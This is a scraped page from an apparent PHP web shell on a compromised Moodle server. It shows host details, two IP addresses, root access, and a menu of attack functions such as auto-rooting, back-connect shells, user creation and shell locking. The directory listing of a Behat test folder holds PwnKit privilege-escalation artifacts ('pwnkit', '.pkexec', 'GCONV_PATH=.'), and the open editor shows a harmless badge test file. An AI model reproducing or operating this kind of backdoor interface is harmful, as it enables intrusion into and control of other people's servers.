Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
badges /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
add_badge.feature
8.36
KB
-rwxrwxrwx
award_badge.feature
15.47
KB
-rwxrwxrwx
award_badge_groups.feature
5.15
KB
-rwxrwxrwx
backpack.feature
5.42
KB
-rwxrwxrwx
badge.png
2.07
KB
-rwxrwxrwx
criteria_activity.feature
3.44
KB
-rwxrwxrwx
criteria_cohort.feature
17.55
KB
-rwxrwxrwx
criteria_competency.feature
8.38
KB
-rwxrwxrwx
criteria_profile.feature
1.28
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
role_visibility.feature
1.98
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : role_visibility.feature
@core @core_badges Feature: Test role visibility for the badge administration page In order to control access As an admin I need to control which roles can see each other Background: Add a bunch of users Given the following "courses" exist: | fullname | shortname | | Course 1 | C1 | And the following "users" exist: | username | firstname | lastname | email | | teacher1 | Teacher | 1 | teacher1@example.com | | manager1 | Manager | 1 | manager1@example.com | And the following "course enrolments" exist: | user | course | role | | teacher1 | C1 | editingteacher | | manager1 | C1 | manager | @javascript @_file_upload Scenario: Check the default roles are visible Given I log in as "manager1" And I am on "Course 1" course homepage And I navigate to "Badges > Add a new badge" in current page administration And I follow "Add a new badge" And I set the following fields to these values: | Name | Course Badge | | Description | Course badge description | And I upload "badges/tests/behat/badge.png" file to "Image" filemanager And I press "Create badge" And I set the field "type" to "Manual issue by role" Then I should see "Teacher" And I should see "Manager" @javascript @_file_upload Scenario: Check hidden roles are not visible Given I log in as "teacher1" And I am on "Course 1" course homepage And I navigate to "Badges > Add a new badge" in current page administration And I follow "Add a new badge" And I set the following fields to these values: | Name | Course Badge | | Description | Course badge description | And I upload "badges/tests/behat/badge.png" file to "Image" filemanager And I press "Create badge" And I set the following fields to these values: | Add badge criteria | Manual issue by role | Then I should see "Teacher" And I should not see "Manager"
Close